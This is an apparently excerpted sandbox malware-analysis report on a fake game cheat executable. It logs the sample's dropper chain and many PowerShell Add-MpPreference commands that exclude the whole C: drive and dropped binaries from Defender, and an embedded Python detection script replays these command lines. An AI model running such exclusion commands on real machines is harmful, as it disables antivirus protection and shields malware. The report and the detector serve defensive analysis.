                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D0FBCA
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D18EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D18EBD
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'
Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'
Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msportComWin\BridgePortsurrogateserverref.exe "C:\msportComWin/BridgePortsurrogateserverref.exe"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\jnowHpJlZlXal.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\services.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\BridgePortsurrogateserverref.exe'Jump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
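The process-creation records above carry the two things a detection engineer keys on in this report: a dropped executable in C:\msportComWin (reached via wscript.exe running a .vbe, then cmd.exe running a .bat) that goes on to spawn csc.exe, and a long run of powershell.exe Add-MpPreference -ExclusionPath calls that exclude the drive root, every top-level directory and each dropped binary (including a services.exe under C:\Recovery) from Defender scanning. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it replays those command lines through a handful of rules of the kind the Sigma signatures listed in this report encode. The (parent, child, command line) record layout, the rule names, the trusted-root list and the extra -EncodedCommand record are assumptions made here; that encoded record is constructed because the report flags a Base64-encoded MpPreference cmdlet while the calls shown above are plain text, and a rule that only greps the visible command line would miss the encoded form.

```python
import base64
import binascii
import re
from pathlib import PureWindowsPath

# Process-creation records as (parent_image, child_image, child_command_line).
# The command lines are copied from the report above; the tuple layout is a
# constructed stand-in for a Sysmon Event ID 1 / EDR export. The -EncodedCommand
# record is constructed: the same cmdlet, base64(UTF-16LE) encoded as PowerShell expects.
_BRIDGE = r"C:\msportComWin\BridgePortsurrogateserverref.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
ENCODED_SAMPLE = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:/ProgramData/'".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe", r"C:\Windows\SysWOW64\wscript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe"'),
    (r"C:\Windows\SysWOW64\wscript.exe", r"C:\Windows\SysWOW64\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "'),
    (r"C:\Windows\SysWOW64\cmd.exe", _BRIDGE, r'"C:\msportComWin/BridgePortsurrogateserverref.exe"'),
    (_BRIDGE, _CSC, '"' + _CSC + r'" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"'),
    (_BRIDGE, _PS, "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/'"),
    (_BRIDGE, _PS, "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'"),
    (_BRIDGE, _PS, "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:\\Recovery\\services.exe'"),
    (_BRIDGE, _PS, "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:\\Program Files\\7-Zip\\Lang\\jnowHpJlZlXal.exe'"),
    (_BRIDGE, _PS, '"powershell" -EncodedCommand ' + ENCODED_SAMPLE),  # constructed
    (_CSC, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe", "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
]

EXCLUSION_RE = re.compile(r"(?:Add|Set)-MpPreference\b.*?-ExclusionPath\s+'([^']+)'", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
TRUSTED_ROOTS = (r"c:\windows", r"c:\program files", r"c:\program files (x86)")  # assumption: local allowlist
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SYSTEM_BINARY_NAMES = {"services.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "explorer.exe"}
EXECUTABLE_SUFFIXES = {".exe", ".dll", ".scr", ".com"}


def _norm(path: str) -> str:
    # PureWindowsPath folds forward slashes to backslashes; drop the trailing one, compare case-insensitively.
    return str(PureWindowsPath(path)).rstrip("\\").lower()


def _under(path: str, root: str) -> bool:
    n = _norm(path)
    return n == root or n.startswith(root + "\\")


def _trusted(path: str) -> bool:
    return any(_under(path, root) for root in TRUSTED_ROOTS)


def expand_encoded(cmdline: str) -> str:
    """Append the decoded payload of any -EncodedCommand argument so the rules see the real cmdlet."""
    out = cmdline
    for blob in ENCODED_RE.findall(cmdline):
        try:
            out += " " + base64.b64decode(blob).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            pass  # not a valid encoded command; leave the line as it is
    return out


def classify_exclusion(target: str) -> str:
    """Rank an -ExclusionPath value: a whole drive or top-level directory hides everything beneath it."""
    p = PureWindowsPath(target)
    depth = len(p.parts) - 1  # 0 = drive root, 1 = top-level directory such as C:\Windows
    if p.suffix.lower() in EXECUTABLE_SUFFIXES:
        if p.name.lower() in SYSTEM_BINARY_NAMES and not _under(target, r"c:\windows"):
            return "defender_exclusion_masquerade"  # e.g. services.exe outside C:\Windows
        return "defender_exclusion_file"
    if depth <= 1:
        return "defender_exclusion_broad"
    return "defender_exclusion"


def analyze(events):
    """Return (rule, detail) findings for a list of (parent, child, cmdline) records."""
    findings = []
    for parent, child, cmdline in events:
        parent_name = PureWindowsPath(parent).name.lower()
        child_name = PureWindowsPath(child).name.lower()
        m = EXCLUSION_RE.search(expand_encoded(cmdline))
        if m:
            findings.append((classify_exclusion(m.group(1)), m.group(1)))
        if parent_name in SCRIPT_HOSTS and child_name == "cmd.exe":
            findings.append(("script_host_spawns_cmd", cmdline))
        if parent_name == "cmd.exe" and not _trusted(child):
            findings.append(("cmd_launches_untrusted_exe", child))
        if child_name == "csc.exe" and not _trusted(parent):
            findings.append(("csc_from_untrusted_parent", parent))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
```

Run as a script it prints one finding per matching record; in practice the input would be Sysmon Event ID 1 or EDR process telemetry. Because the exclusions outlive the PowerShell processes that added them, confirm the state on a suspect host with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` and clear entries with `Remove-MpPreference -ExclusionPath`, rather than relying on the process log alone.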
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0F654 cpuid 0_2_00D0F654
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00D0AF0F
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeQueries volume information: C:\msportComWin\BridgePortsurrogateserverref.exe VolumeInformationJump to behavior
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeQueries volume information: C:\msportComWin\jnowHpJlZlXal.exe VolumeInformationJump to behavior
                                    Source: C:\msportComWin\jnowHpJlZlXal.exeQueries volume information: C:\msportComWin\jnowHpJlZlXal.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
